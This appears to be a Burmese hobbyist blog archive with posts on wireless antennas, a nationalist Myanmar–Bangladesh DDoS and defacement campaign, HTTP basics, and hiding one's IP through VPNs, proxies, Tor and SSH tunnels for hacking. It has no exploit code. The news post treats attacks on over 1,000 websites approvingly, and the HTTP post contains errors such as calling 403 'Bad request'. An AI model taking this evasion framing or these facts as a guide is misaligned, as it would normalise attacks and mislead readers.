Repeater Mode ဆိုသည်မှာ Access Point မှတိုက်ရိုက်ချိတ်ထားသည့် အခြားသော Access Point မှတဆင့် Wire Network သို့ထပ်မံချိတ်ဆက်ခြင်းဖြစ်သည်။တနည်းအားဖြင့် Repeater Mode အားအသုံးပြုထားသည့် Access Point သည် Upstream (Root Mode) အားအသုံးပြုထားသည့် Access Point နှင့်ချိတ်ဆက်ကာ Wire Network သို့ထပ်မံချိတ်ဆက် ခြင်းဖြစ်ပါသည်။
၃ ) Brigde Mode
Bridge Mode ဆိုသည်မှာ မတူညီသည့် Access Point နှစ်ခုအကြားအချင်းချင်း အပြန် အလှန်ချိတ်ဆက်မိစေရန်အတွက် အသုံးပြုသော Mode ဖြစ်ပါသည်။ နောက်ထပ် Wireless Antenna များအကြောင်းကို ထပ်မံ ရှင်းပြပါ့မယ် ။
Wireless Antenna များ
Wireless Network အား အကွာအဝေးပိုမိုချိတ်ဆက်မိစေရန်နှင့် IEEE 802.11 Standard \ Range အားတိုးချဲ့စေရန်အတွက် External Antenna များအား အသုံးပြုဖို့ လိုအပ်လာပါတယ် ။ ( Hand made Antenna များဖြင့် ပြုလုပ်နိုင်သော်လည်း ထိရောက်မှု သိပ်မရှိလှတာကို တွေ့ရပါတယ် ) Wireless Network တွင် အဓိက အားဖြင့် အောက်ဖော်ပြပါ Antenna များအား အသုံးပြုကြပါသည် ။

၁) Omni Directional Antenna
၂) Directional Antenna တို့ဖြစ်ပါသည်။


၁ ) Omni Directional Antenna






Omni Directional Antenna သည် Common Base Antenna အမျိုးအစားဖြစ်ပြီး Point-to Multipoint စနစ်ဖြစ်ပါသည်။ ယင်း Antenna သည် အခြားသော Computer ၊ Laptop ၊ PDA များဆီသို့ Signal များအား Distribute ပြုလုပ်သည့်အခါတွင် Main Antenna အဖြစ်အသုံးပြုပါသည်။ Omni Directional Antennaတွင် Wireless Wave များသည် 360 ဒီဂရီ အတိုင်းသွားပါသည်။ထို့ကြောင့် Point-to-Point system တွင်ယင်း Antenna အားအသုံး ပြုမည်ဆိုပါက Signal range နည်းမည်ဖြစ်ပါသည်။ထို့ကြောင့် Point-to-Point system အတွက် Omni Directional Antenna အား recommend မပြုလုပ်ကြပါ။ Omni directional Antenna အား Indoor Unit များအတွက်သာ အသုံးများပါသည်။

၂ )Directional Antenna

Directional Antenna များအား Outdoor Unit များတွင် အသုံးပြုကြပါသည်။ ယင်း Antenna များသည် Signal Wave အား 45 ဒီဂရီအတိုင်းသွားပါသည်။ Directional Antenna များအား Point-to-Point System များအတွက်အသုံးပြုကြပြီး၊ တစ်ခါတစ်ရံတွင် တပ်ဆင်သည့်အ ပေါ်မူတည်၍ Multipoint System အတွက်လည်းအသုံးပြုကြပါသည်။ အောက်ဆုံးက အင်တင်နာဆိုရင် ထိုင်းဘတ် ( ၉၀၀ ) လောက် တော့ ရှိပါတယ် ။ 

posted by gtone

Read More ->>

Saturday, June 23, 2012

News for Myanmar Cyberwarfare


မြန်မာနိုင်ငံရခိုင်ပြည်နယ်မှာဖြစ်ပွားနေတဲ့ ရိုဟင်ဂျာ လူမျိုးစုပြသနာများမှသည် မြန်မာနှင့်ဘင်္ဂလားရှေ့် ဟက်ကာများ Cyber တိုက်ခိုက်မှုအပြန်အလှန်ဖြစ်သည်
အထိတင်းမာခဲ့ကြသည်။ပြည်တွင်း Underground Hacker များဖြစ်ကြသော Blink Hacker Group၊ဦးဆောင်၍ Operation Rohingya Group ကို Facebook
ပေါ်တွင်တည်ထောင်ပြီး ၁၂.၆.၂၀၁၂  ခန့်မှစ၍  Bangladesh Websiteများကိုစတင်တိုက်ခိုက်ခဲ့သည်။ထို့ ပြင်  အခြား Myanmar Hackers Group များပါဝင်လာပြီး
Myanmar Cyber Army အဖွဲ့ ကြီးကိုတည်ထောင်ကာ Bangladesh Website များကိုဆက်လက်တိုက်ခိုက်ခဲ့သည်။ Bangladesh Hackerများဘက်ကလဲ
BBHG (Bangladesh Black Hat Group)၊Bangladesh Cyber Army စသည့်အဖွဲ့ စည်းများတည်ထောင်ကာ မြန်မာဝက်ဘ်ဆိုက်များကို တိုက်ခိုက်ခဲ့သည်။
တိုက်ပွဲမှာပြင်းထန်လွန်းလှပြီး DDOS attack ကို နှစ်နိုင်ငံလုံးမှအသုံးချခဲ့ကြသည်။ အပြန်အလှန် Cyber Army များက မိမိတို့  Group Member များ (Beginner)များ
ကူညီတိုက်ခိုက်၍ရနိုင်ရန် DDOS Toos များ ၊ Training များကိုပို့ချပြီးအဆက် အပြတ်တိုက်ခိုက်နေခဲ့ကြသည်။၎င်းတိုက်ခိုက်မှုများတွင် နှစ်ဖက်နိုင်ငံများမှအင်အားတော်
တော်များများပါဝင်လှုပ်ရှားခဲ့တာတွေ့ ရပါတယ်။DDOS ကအလွယ်ကူဆုံးတိုက်ခိုက်မှုဖြစ်တာကြောင့် Beginner များပါဝင်တိုက်ခိုက်မှုပိုများခဲ့တာဖြစ်ပါတယ်။
၂ ပတ်အတွင်းရရှိထားသောစာရင်းများအရ မြန်မာဘက်မှ ဘင်္ဂလားရှေ့် ဝက်ဘ်ဆိုက် ၁၀၀၀ ကျော် ရရှိထားပြီး ဘင်္ဂလားရှေ့်ဘက်မှ မြန်မာဆိုက် ၃၀ ခန့်သာရရှိထားပါ
တယ်။ဒါအပြင် Blink Hacker Group နှင့် Myanmar Cyber Army စာမျက်နှာများတွင်ဖေါ်ပြထားချက်မှာ ၂၃.၆.၂၀၁၂ နေ့ 4:00 ခန့်တွင် ဘင်္ဂလားရှေ့်၏အကြီးဆုံး Hosting ကို မြန်မာဟက်ကာများကတိုက်ခိုက်နိုင်ခဲ့ပြီဖြစ်ကြောင်းသိရပါတယ်။Bangladesh Hacker များဘက်က Virus များကိုမြန်မာ
ဘက်သို့ ပို့လွှတ်နေကြောင်း၊၄င်း Virus များနှင့် မြန်မာဝက်ဘ်ဆိုက်များကို Myanmar Hackers များက Recovery လုပ်ပေးနေကြောင်းလဲသိရပါတယ်။
အဆိုပါသတင်းများအရ ဆိုက်ဘာတိုက်ခိုက်မှုများဟာ ဆက်လက်ဖြစ်ပွားနေဆဲဖြစ်ပြီး၊ရိုဟင်ဂျာပြသနာမပြီးဆုံးသ၍ဖြစ်ပွားနေဦးမှာဖြစ်သည်ဟု ဟက်ကာအသိုင်း
အ၀ိုင်းမှ ပြောကြားသွားပါသည်။
News By 3thic0kiddi3

copy from ghostarea.net
Read More ->>

Tuesday, June 5, 2012

Introduction to HTTP Protocol



ဒီ post လေးထဲမှာ HTTP Protocol အကြောင်းနည်းနည်းလေးပြောချင်ပါတယ်။

HTTP (Hyper Text Transfer Protocol) ဆိုတာ ကမ္ဘာပေါ်မှာအသုံးအများဆုံး protocol တခုပါ။ သူ.ကိုဘယ်နေရာမှာ သုံးလဲဆိုတော့ ကျွန်တော်တို.နေ.တိုင်းသုံးနေမြင်နေ ထိတွေ.နေရတဲ. World Wide Web ကြီးပေါ့ဗျာ။ကျွန်တော်တို. အနေနဲ.တကယ်လို. WWW ကိုသုံးတော့မယ်ဆိုရင် မရှိမဖြစ်လိုတဲ့အရာ နှစ်ခုရှိပါတယ်။ ပထမ တခုက browser ပါ။သူကတော့ client ပေါ့။နောက်တခုက တော့ client ကို service ပေးမဲ့ server ပေါ့အဲဒါကတော့ web server ပါပဲ။ အသုံးများတဲ့ browser တွေကတော့ firefox, Internet Explorer ပေါ့ဗျာ။ အသုံးများတဲ့ Web Server တွေကတော့ IIS နဲ. Apache Web Server ပေါ့။ ကျွန်တော်တို.က ကြိုက်တဲ့ဆိုက်ကို ကြိုက်တဲ့ browser နဲ.ကြည့်လို.ရတယ်ဗျာ။ အဲ web browser နဲ. အမျိုးမျိုးသော မတူညီတဲ့ Web Server တွေဘယ်လိုဆက်သွယ်သလဲ အလုပ်လုပ်သလဲပေါ့။ အဲဒီမှာ မင်းသားကြီးကတော့ HTTP protocol ပေါ့ဗျာ ။ Protocol ကိုမြန်မာမှု.ပြုရင်တော့ Client ကွန်ပျုတာနဲ. Server ကွန်ပျုတာကြား နားလည်မှု.ယူထားတဲ့ လိုက်နာရမဲ့စည်းကမ်းတွေပေါ့။ ဟ ဘာစည်းကမ်းတွေတုံးဆိုတော့ browser က server နဲ. Html ဖိုင်တခုကိုလိုချင်ရင် ဘယ်လိုဆက်သွယ်ရမယ်။ ဟော server အနေနဲ. ဖိုင်ကိုရှာပေးနိုင်ရင် client ကိုဘယ်လိုပြန်အကြောင်းပြန်ရမယ် သူ.ရဲ. content တွေကိုဘယ်လို ပြန်ပေးရမယ် စသည်ဖြင့်ပေါ့ အဲဒါတွေကို သတ်မှတ်ထားတာပေါ့ဗျာ။
HTTP protocol က Network Layer တွေရဲ.ဘယ်အပေါ်မှာ အလုပ်လုပ်သလဲဆိုတော့ Transport Layer အပေါ်မှာအလုပ်လုပ်ပါတယ် ။ Transport Layer မှာ သူက TCP protocol ကိုသုံးပါတယ်. ဘာလို.လဲဆိုတော့ TCP ရဲ.သဘောသဘာဝက reliable data transfer ကိုပေးနိုင်လို.ပါပဲ။ Reliable Data Transfer ဆိုတာကတော့ဗျာ တဖက်ကပို.လိုက်တဲ့ data packet တွေကဟာမပျောက်ပဲနဲ. တဖက်ကိုရောက်ရှိနိုင်တာကိုပြေတာပါ။ အခြားသော pouplar protocol တွေဖြစ်တဲ့ အီမေး တွေအတွက်သံုးတှဲ့SMTP ဟာလည်း HTTP ကဲ့သို. TCP ကိုသုံးပါတယ်။ HTTP protocol ဟာ text based protocol ဖြစ်ပါတယ်။ ဆိုချင်တာက မိတ်ဆွေအနေနဲ. HTTP protocol ကိုဖတ်ပြီးတော့နားလည်နိုင်ပါတယ် ဘာလို.လဲဆိုတော့ သူရဲ. Format က text ဖြစ်တဲ့အတွက်ပါပဲ။ binary ဆိုရင်တော့ ဖတ်လို.ခက်ပါလိမ့်မယ်။
Web Server တွေနဲ. Web Client တွေဟာ HTTP ကိုသုံးပြီးဆက်သွယ်ပါတယ်။ ဆက်သွယ်မှု.ပုံစံကတော့ Request, Response model ဖြစ်ပါတယ်။ Request, Response model ဆိုတာကတော့ဗျာ Web client က Web Server ဆီက တခုခုလိုချင်တယ်ဆိုပါတော့ အဲဒီအချိန်မှာ Web Client ကနေ Web Server ဆီကို HTTP request တခုလွှတ်လိုက်ပါတယ်။ အဲဒီ request ကို Web Server ကနေနားလည်ပြီးတော့ web client တောင်းဆိုတာကို message တခုအနေနဲ.ပြန်ပေးပါတယ် response ပေါ့ဗျာ။ ဆိုချင်တာက HTTP Protocol အပေါ်မှာဘာပဲလုပ်လုပ် resquest လာမယ် ပြီးရင် server ကနေ response ပြန်လာမယ်ပေါ့။ ဒီလိုနည်းနဲ.ပဲအလုပ်လုပ်ကြပါတယ်။ နောက်ပြီးတော့ resquest တခုနဲ.တခုကလဲ အဆက်အသွယ် relation မရှိကြပါဘူး။ အဲဒီမှာကြုံတွေ.ရတဲ့ပြဿနာကတော့ session ပြဿနာပါပဲ။ HTTP ဟာ request, response နဲ.သုံးတဲ့ stateless protocol ဖြစ်တာကြောင့် session ကို cookies ဒါမှမဟုတ် တခြားနည်းတွေနဲ.ဖြေရှင်းရပါတယ်။ HTTP ဟာ statelss ဖြစ်တယ်ဆိုတာ တော့ ပထမလွှတ်လိုက်တဲ့ request နဲ. ဒုတိယလွှတ်လိုက်တဲ့ request တွေဟာတူညီတဲ့ client တွေဖြစ်တယ်ဆိုတာ တနည်းအားဖြင့်သူတို.တွေဟာတဆက်တည်းဖြစ်တယ်ဆိုတာ related ဖြစ်တယ်ဆိုတာမသိတာပါပဲ။
ကဲ အခု HTTP Client ကနေ Web Server ကိုဘယ်လို Request လွှတ်သလဲ Response ပြန်သလဲဆိုတာကိုရှင်းပါ့မယ်။ Request, Response အားလုံးဟာ HTTP Message တွေပါ။ သူတို.မှာတိကျတဲ့ format ပုံစံရှိပါတယ် ဒါမှသာလျှင် various Web Server တွေ Web Client တွေဟာအတူတကွအလုပ်လုပ်နိုင်မှာပါ။ HTTP message တွေမှာ request အတွက် format တမျိုး, response အတွက်တော့သက်သက်တမျိုးထားပါတယ် အောက်ကပုံမှာ အဲဒါတွေကိုပြထားပါတယ်။


အပေါ်ဆုံးပုံက က request message ကိုပြထားတာပါ။
ဒုတိယပုံကတော့ reponse message ကိုပြထားတပါ။ ဆိုပါတော့ဗျာ ကျွန်တော်တို.က server တခု ကနေ /pet-products.txt ဖိုင်တဖိုင်ကိုလိုချင်တယ်ဆိုပါတော့ ဒါဆိုရင် ပထမဆုံးပုံ ပါအတိုင်းတောင်းရမှာပါ။ အဲလိုတောင်းမယ်ဆိုရင် server အနေနဲ. တောင်းတဲ့ဖိုင်ကိုပေးနိုင်တယ် ဆိုရင် ဒုတိယပုံ အတိုင်း ပြန်ပေးပါလိမ့်မယ်။ Request Message ကိုသေသေချာချာကြည့်ရအောင် သူ.မှာ နှစ်ပိုင်းပါ ပါတယ် ။ Strat Line ရယ် request line ရယ်ပေါ့ဗျာ။ Start Line ဆိုတာ GET /pet-products. HTTP/1.1ပေါ့။ အဲ့မှာသုံးပိုင်းပါ ပါတယ် GET ဆိုတာရယ် /pet-products.txt ရယ် HTTP/1.1 ရယ်ပေါ့။ GET ကတော့ HTTP method တခုပါ။ ဘယ်နေရာမှာသုံးတာလဲဆိုတော့ resource တခုခုကို server ကနေတောင်းချင်ရင် သို.မဟုတ် server side program တခုခုကို run ချင်ရင်သုံးပါတယ်။ ကျွန်တော်တို.ဟာ အခု /pet-products.txt ကိုတောင်းတာဖြစ်တဲ့အတွက် GET ကိုသုံးတာပါ။ image တခုကိုလိုချင်ရင်လဲအဲလိုပဲတောင်းရမှာပါ။ HTTP method နောက်မှလိုက်ရတာက တော့လိုချင်တဲ့ resource ပေါ့ အခု ဒီမှာဆိုရင်တော့ /pet-products.txt ပေါ့ဗျာ ။ နောက်ဆုံးအပိုင်းကတော့ HTTP protocol version ပေါ့။ လောလောဆယ် အသုံးအများဆုံး version ကတော့ HTTP/1.1 ပါပဲ။ HTTP/1.0 ကတော့ browser အဟောင်းတွေမှာသုံးပါတယ် တွေ.ရခဲပါတယ်။ HTTP request နဲ.နောက်တပိုင်းကတော့ request line သို.မဟုတ် body ပေါ့ဗျာ သူကတော့ request မှာလိုအပ်တဲ့တခြား metadata တွေကိုထည့်ပေးလိုက်ဖို.သုံးပါတယ်။ ဒီမှာဆိုရင် Accept: ဆိုတဲ့ metadata ပါပါတယ် သူကဘာပြောတာလဲဆိုရင် client ကနေလက်ခံနိုင်တဲ့ content type အမျိုးအစားတွေပါ။ ဒီဥပမာ မှာဆိုရင် အားလုံးလက်ခံတယ်ပေါ့ ။နောက်တခုက Host: ပါ အဲဒါကတော့ကျွန်တော်တို. Request ကိုလွှတ်တဲ့ computer ရဲ. IP သို.မဟုတ် domain name ပေါ့ဗျာ။ အခုဥပမာပေးထားတဲ့ request ကို နားလည်အောင်ပြောရရင်တော့ ဟေ့ web server ရေ ငါ့ကို /pet-products.txt ပေးစမ်းကွာ။ ငါက HTTP/1.1 ကိုသုံးထားတာကွ။ ငါကို.ရှိတာပေး လက်ခံနိုင်တယ်ကွာ ပေါ့ဗျာ ။file တွေပဲကွ။ ငါ့ရဲ. Host name က www.joes-hardware.com ကွလို.ပြောလိုက်တာပါ။ ဒီ request ကို TCP အပေါ်ကနေ လိုချင်တဲ့ server ဆီကိုပို.လိုက်ရပါတယ်။ Web Serverတွေဟာများသောအားဖြင့် TCP port 80 မှာ connection တွေကိုလက်ခံပြီးအလုပ်လုပ်ပါတယ်။ ဒီ request ကို web server ကနားလည်ပြီးတော့ သူညွန်ကြားတဲ့အတိုင်းလုပ်ပါလိမ့်မယ်။ အဆင်ပြေရင် response ပြန်ပေးပါလိမ့်မယ်။ GET အပြင်တခြား HTTP method တွေလဲရှိပါသေးတယ်။ popular ဖြစ်တာကတော့ POST ပေါ့ ။သူက server မှာရှိတဲ့ program ကို run ဖို.အတွက်သုံးတာပါပဲ။ ကဲ GET နဲ.လဲလုပ်လို.ရသားနဲ. ဘာလို. POST ကိုသုံးတာလဲပေါ့။ GET နဲ.သာ server side program ကိုလှမ်း run မယ်ဆိုရင် program အတွက်လိုအပ်တဲ့ parameter တွေဟာ HTTP message ရဲ. Header သို.မဟုတ် start line ကနေပို.တဲ့အတွက် parameter တွေကိုမြင်နေရပါတယ်။ POST ကိုသုံးတဲ့အခါ ကျတော့ parameter တွေကိုmessage ရဲ. Body ကနေပို.တာဖြစ်တဲ့အတွက်မမြင်ရတော့ပါဘူး။ နောက် သုံးလို.ရတဲ့ HTTP method တွေကတော့
HEAD သူကတော့ header inforamation တောင်းရင်သုံးပါတယ် ဥပမာ server အမျိုးအစားနဲ. Versoin အဲဒါတွေလိုချင်ရင်သုံးပါတယ်။
PUT ကတော့ဗျာ တခုခုကို server မှာသွားတင်ချင်ရင်သုံးပါတယ် server တော်တော်များများကအဲဒါကိုပေးမသုံးပါဘူးပိတ်ထားတတ်ပါတယ်
TRACE ကတော့ proxy server တွေကနေ web server ကိုဘယ်လိုသွားတယ်ဆိုတာသိချင်ရင်သုံးပါတယ်
OPTIONS ကတော့ server ကဘယ် method တွေကိုပေးသုံးလဲနဲ. ဘာတွေကို Handle လုပ်နိုင်လဲဆိုတာအတွက်သုံးပါတယ်
DELETE သူကတော့ server မှာရှိတဲ့ ဖိုင်တွေကိုဖျက်ဖို.သုံးပါတယ် သူ.ကိုလဲ သာမာန်အားဖြင့်ပေးမသုံးပါဘူး ပိတ်ထားလေ့ရှိပါတယ်။
အခု response message အကြောင်းရှင်းကြရအောင်။ ကျွန်တော်တို.ပို.လိုက်တဲ့ message ကို server ကနားလည်ပြီးတော့တောင်းတာကိုပေးနိုင်တယ်ဆိုပါတော့ဒါဆိုရင် ဒုတိယပုံ မှာပါတဲ့အတိုင်းပြန်ပေးပါလိမ့်မယ်။ Response မှာသုံးပိုင်းပါပါတယ် start line, header ရယ် body ရယ်ပေါ့။ start line မှာတော့ HTTP/1.1 200 OK ဆိုတာလေးကိုတွေ.ပါလိမ့်မယ် HTTP/1.1 ကတော့ version ပါ။ 200 ကတော့ server ဟာ client ရဲ. Request ကိုအောင်မြင်တယ် အိုကေတယ်ကိုအကြောင်းပြန်တာပါ။ အဲဒါကို status code လို.ခေါ်ပါတယ် အောင်မြင်ရင် 200 ပေါ့ဗျာ သူ.နောက်က ok ကတော့ 200 ကို ကိုယ်စားပြူတဲ့စာသားပါပဲ။ status code ကိုကြည့်ပြီးတော့မှ browser ဟာသူဘာဆက်လုပ်ရမယ်ဆိုတာသိပါလိမ့်မယ်။ 200 အပြင်တခြားသော status code တွေလဲရှိပါသေးတယ်။ အဲဒါတွေကထဲမှာအသုံးများတာ 403 Bad request, နဲ. 500 Internal Server Error တို.ပါပဲ။ start line ပြီးသွားရင် response header လာပါပြီ။သူ.မှာလဲ response နဲ.ပတ်သတ်ပြီးတော့ metadata တွေကိုထည့်ဖို.သုံးတာပါပဲ။ ဥပမာ sound ဖိုင်တဖိုင်ဆိုရင် ဘယ်လို အမျိုးအစားလဲ အဲလိုအမျိုးအစားသိတော့မှ ဘယ် player နဲ. Run ရမယ်ဆိုတာ browser ကသိမှာပါ။ဒီ ဥပမာမှာပြန်လာတာကတော့ Content-Type: text/plain ဖြစ်ပါတယ် ဒါဆိုရင် browser အနေနဲ.အခုပြန်လာတာဟာ text file တခုဖြစ်တယ်ဆိုတာသိပါပြီ အဲဒီတော့ ဒီ text file ကို display လုပ်ပါလိမ့်မယ် အကယ်လို.သာ သူဟာ text/html ဖြစ်နေတယ်ဆိုရင် အဲဒီ content ကို html အနေနဲ. Render (ပုံဖော်)ဖို.လုပ်မှာပါ။ Content-Type နောက်မှာပါလာတာကတော့ Content-Length: 19 ဖြစ်ပါတယ် သူကဘာကိုရည်ညွန်းတာလဲဆိုရင် ပြန်လာတဲ့ respone ရဲ. Message body ဟာ 56 bytes ရှိတယ်လို.ပြောတာပါ။အဲဒါကိုသိတဲ့အတွက်သာ web browser ဟာ messge body ထဲကနေ ဘယ် နှစ်byte ဖတ်ရမလဲဆိုတာသိမှာပါ။ ပြောဖို.ကျန်ခဲ့တာကတော့ Start Line, message header, body တွေကို \r\n newline နဲ.ခြားထားတယ်ဆိုတာပါပဲ။ နောက်ဆုံးအပိုင်းကတော့ content ပါပဲ။ ကျွန်တော်တို.က text file တခုကိုတောင်းတဲ့အတွက် text တွေပါလာတာပါ။ တကယ်လို. Html ဖိုင်တခုကိုသာတောင်းခဲ့မယ်ဆိုရင် html content တွေရမှာပါ။ပြန်လာတဲ့ response ကိုကြည့်ပြီးတော့ browser အနေနဲ. Content ကို render လုပ်နိုင်ပါပြီ။ ကဲ အဆင်ပြေမယ်လို.တော့မျှော်လင့်ပါတယ်ဗျာ။ HTTP protocol ကိုတကယ်စမ်းချင်ရင်တော့ netcat, ဒါမှမဟုတ် telnet နဲ.စမ်းလို.ရပါတယ်။ 

source http://mmcyberdevils.com/index.php?/topic/69-introduction-to-http-protocol/
Read More ->>

Staying Anonymous (part two)



ဒီနေ့တော့ နောက်ထပ်တစ်ပိုင်းအနေနဲ့ ကျွန်တော် သိသလောက်ဆက်လက်တင်ပြသွားမှာပါ..ဒီတစ်ခါလဲအမွှားပါသွားရင် ခွေးလွတ်ပေးစေချင်ပါတယ်...။
အရင်တုန်းက offline protection ဆိုတော့ အခု နောက်တစ်ပိုင်းအနေနဲ့ online protection ပေါ့...။

Online protection

Types of online protection

  1. VPN(s)
  2. Proxies
  3. Tor
  4. SSH Tunneling
တို့ဖြစ်ကြပါတယ်......။

VPN (Virtual Private Network)

တစ်မျိုးအားဖြင့် ကျော်မယ်ခွမယ် IP ပြောင်းမယ်ဆိုရင်သုံးတယ်ဗျ...။ဘယ်လိုပြောရမလဲဆိုတော့ သူဟာ
network တစ်မျိုးဖြစ်ပြီးတော့ အဓိကအားဖြင့် public telecommunication infrastructure ဖြစ်ပါတယ်...။
ပြောမယ်ဆိုရင် အများလည်းသုံးရတဲ့ network တစ်မျိုးဖြစ်ပြီးတော့ ကျွန်တော်တို့ websites တွေဝင်ရောက် တဲ့အခါ လုံခြုံမှုကိုပေးပြီးတော့ IP တွေကိုလဲ ဖျောက်ဖျက် ပေးမှာဖြစ်ပါတယ်....ဥပမာအားဖြင့် Myanmar နိုင် ငံက IP ကို US က IP အဖြစ်ပြောင်းလဲနိုင်မှာပါ....။ဘလော့ဂါတွေအတွက်လဲ အခက်အခဲမရှိ ကျော်ခွ သုံးနိုင် ပါတယ်...ဥပမာ skynet လိုင်သုံးတဲ့သူမျိုးတွေအတွက် တကယ်အသုံးတဲ့ပါတယ်...ဘလော့ဂါတိုင်းဆောင် ထားသင့်ပါတယ်....။ လူအများနဲ့ သုံးလို့ရတာကြောင့် အကောင့်တစ်ခုကို လူအများကြီး သုံးဆွဲရင် Bandwith မနိုင်ရင်အသုံးပြုရတာလေးကန်နိုင်ပါတယ်.....။

Free VPNs

Cyberghost
HotSpot Shield
Pro XPN
Open VPN

Paid VPNs

nVPN
SwissVPN 

HTTP Proxies and SOCKS5

ကျွန်တော်တို့ အနေနဲ့ ပရုပ်ဆီပြောင်းပြီး လိုင်းပေါ်မှာနေရာပြောင်းနိုင်ပါသေးတယ်...မြောက်များစွာသော
ပရုပ်ဆီ List တွေကို အောက်ပါနေရာများကနေ အလကာရယူလိုက်ပါ....။

Alive Proxy
Hide My Ass
Proxy list

မှတ်ချက် Hide My Ass proxy တွေကို Hacking လုပ်တဲ့နေရာမှာမသုံးရ...။

Hackforums မှ proxy lists များကို ဒီနေ ရာမှာရနိုင်သေးပါတယ်....။

Premium and Private SOCKS5 တွေအတွက်ကတော့ Google search မှာရှာဖွေလေ့လာနိုင်ပါသေး
တယ်...။

Some Proxy sites

ပရုပ်ဆီဆိုက်တွေအများကြီးရှိပါတယ်...လုံးခြုံစိတ်ချရသော ဆိုက်တစ်ချို့ကိုတင်ပြပေးထားပါတယ်...

http://www.ninjacloak.com
http://www.hidemyass.com
http://go-between.me
http://ir2.me
http://rapidsurf.info
http://go-between.me
http://ir2.me
http://rapidsurf.info
http://yourownproxy.info
http://proxy.co.cc
http://iknownothing.org
http://accessyouth.info
http://buwk.com
http://UnblockFree.net
http://hillofbeans.biz
http://aptunnel.com
http://goaheadmakemyday.org
http://lameproxy.info
http://centerfoldproxy.info
http://proxylist.co
http://sneaky9.com
http://freesurfproxy.com
http://goflyakite.org
http://fastieproxy.com
http://ihaveacunningplan.info
http://schoolfreezone.com
http://proxify.net
http://passmethru.com
http://proxy2use.com
http://0001.cz.cc

ကျော်လို့ခွလို့လဲ အဆင်ပြေနိုင်ပါတယ်....။

Tor

Tor ဆိုတာအလာရတဲ့ free software ဖြစ်ပါတယ်....သင့် secure browsing တွက်လိုအပ်တဲ့ဆော့ဝဲပါ...
Hide anonymous လုပ်နိုင်တဲ့အပြင် မိမိ IP address ကိုပါနေရာရွေ့ နိုင်ပါသေးတယ်..။

အပြည့်အစုံကို ဒီမှာဆက်လက်ဖတ်ရှုနိုင်ပါတယ်....။
https://www.torproject.org/about/overview.html.en

Download Here
Download Here


SSH Tunneling

SSH Tunneling ကိုအသုံးပြုဖို့ အောက်ပါ ဆော့ဝဲတွေ လိုအပ်ပါတယ်.....။

  1. PuTTY
  2. Firefox
Download PuTTY Here




ကဲ အောက်ပါအတိုင်းလိုက်ပြီးလုပ်လိုက်ကြရအောင်

1.PuTTY ကိုဖွင့်လိုက်ပါ.
2.ပြီးရင် Text Box မှာ သင့် IP address ကိုထည့်ရပါမည်...။


3.ပြီးရင် ဘယ်ဘက် အခြမ်းက အကွက်ထဲက List တွေထဲမှာ အောက်ဆုံးနာလောက်မှာ SSH ဘေးက '+'
လေးကိုကလစ်ပြီးဖွင့်ချလိုက်ပါ...။
4. Tunnels ကိုကလစ်လိုက်ပါ...
5. သင် Port ကိုထည့် ရမှာဖြစ်ပြီး  Dynamic ကိုကလစ်လိုက်ပါ။
6. ပြီးရင် ADD နဲ့ Open ကိုကလစ်လိုက်ပါ...။ connection ရအောင်ဆက်သွယ်ပါလိမ့်မယ်..
7. ရပြီဆိုရင်သင့် Browser ထဲကိုသွားပြီး IP ကို 127.0.0.1 လို့ထည့်ပြီး port ရိုက်သွင်းပါ..။
8. ဒီအဆင့်တွေပြီးရင် သင့် Browser ကိုအသုံး ပြုနိုင်ပါပြီ..။

ကျွန်တော်ကဘာသာပြန်ပြီးရေးတာဆိုတော့ အမှားတွေ ပါနိုင်ပါတယ် ဒါ့ကြောင့် လက်သယ် ချည်းပဲ အား ကိုးမနေပါနဲ့ မှုရင်းဆိုက်မှာလဲ တစ်ချက်လောက်ဝင်ကြည့်နိုင်ပါတယ်...။
 
http://www.hackforums.net/showthread.php?tid=2237268

Ebook For Staying Anonymous

နောက်ပြီး Staying Anonymous အတွက် စာအုပ် English version တစ်အုပ်ရှိပဲသေးတယ်  တစ်ခါတည်း တွဲတင်ပေးလိုက်တာ အောက်ပါနေရာက ဒေါင်းနိုင်ပါတယ်....


Download
Download

Auto Hide IP

နောက်ပြီး Auto Hide IP ဆိုတာလေးပါ တစ်ခါတည်းလင့်ချိတ်ပေးလိုက်တယ်....သုံးလို့တကယ်ကောင်း
တယ်.....။

Download

တစ်ခုပြောချင်တာက ဒီလောက်ပုန်းနေလဲရှာနိုင်တဲ့ဟာတွေရှိပါသေးတယ်...။ကျွန်တော်က အစပျိုးပေးလိုက်တာပါ နောက်ထပ် ဆက်လက်လေ့လာကြပါလို့ပြောချင်ပါတယ်...။တကယ်တမ်းကျွန်
တော်လဲလေ့လာဆဲသူတစ်ယောက်ပါ ဘာမှကိုမတတ်သေးပါဘူး ...။အမှာပါရင်ခုထဲက တောင်းပန်ရင် နဲ့
အဆုံးသတ်ပါရစေဗျာ...။

PS: လင့်များမကောင်းရင် Cbox ထဲမှာ ရေးသွားနိုင်ပါတယ်....

http://shwekoyantaw.blogspot.com
shwekoyantaw










Read More ->>

Monday, June 4, 2012

Hackers from the M0VI3




ကျွန်တော်သဘောကျလိုတင်ပေးလိုက်တာပါ...တော်တော်လေးကိုသဘောကျတာ ဘာလို့လဲ သိချင်ရင်
ဆက်လက်ဖတ်ကြည့်ကြပေါ့ဗျာ....
ဘယ်သူ့ကိုမှတိုက်ခိုက်ချင်လို့ရယ်တော့မဟုတ်ဘူး ဒီတိုင်း အပင်ပန်းပြေ ပျော်စေ ပြတ်စေ ကလက်စေပဲ :-D ( တော်ကြာ ကျွန်တော်တစ်ခုခုရေးတိုင်း သူတို့ကို $ ဖောင်းထုပါတယ် လုပ်တဲ့လူတွေရှိနေလို့ :-D )
ဟုတ်ပါတယ် ကျွန်တော်တို့ ဇာတ်လမ်းတွေထဲမှာ Hacker တွေမြင်ဖူးကြမယ်ထင်ပါတယ် လွှတ်ကောင်း ကွန်ပျုတာအများကြီး စော်အလန်းလေးနဲ့  :-D အဲ့ဒီ့လို Hacker တွေအကြောင်းပေါ့ဗျာ
၁.Monitor များ
ဘယ် Hacker မဆိုပါ ဇာတ်လမ်းတွေထဲမှာဆို များလိုက်တဲ့ Monitor တွေ မျက်စိခြောက်လုံးပါတောင် မလောက်ဘူး ကြည့်ရတာတော့ရေလည်မိတယ် မော်နီတာတွေအများကြီးနဲ့ မင်းသား Hacker က မိန့်မိန့်ကြီး ထိုင်လို့ လန်ကျွတ်နေတာပဲ :-D
၂.Typing Skill
အို Command ပေးတာကြည့်ဦးမလား မြန်လိုက်တဲ့ဖြစ်ခြင်း ခလုတ်နဲ့လက်တောင် ထိရဲ့လားမသိဘူး စန္ဒယား တီးသလိုပဲ Lol :-P
၃.Never Use Mouse
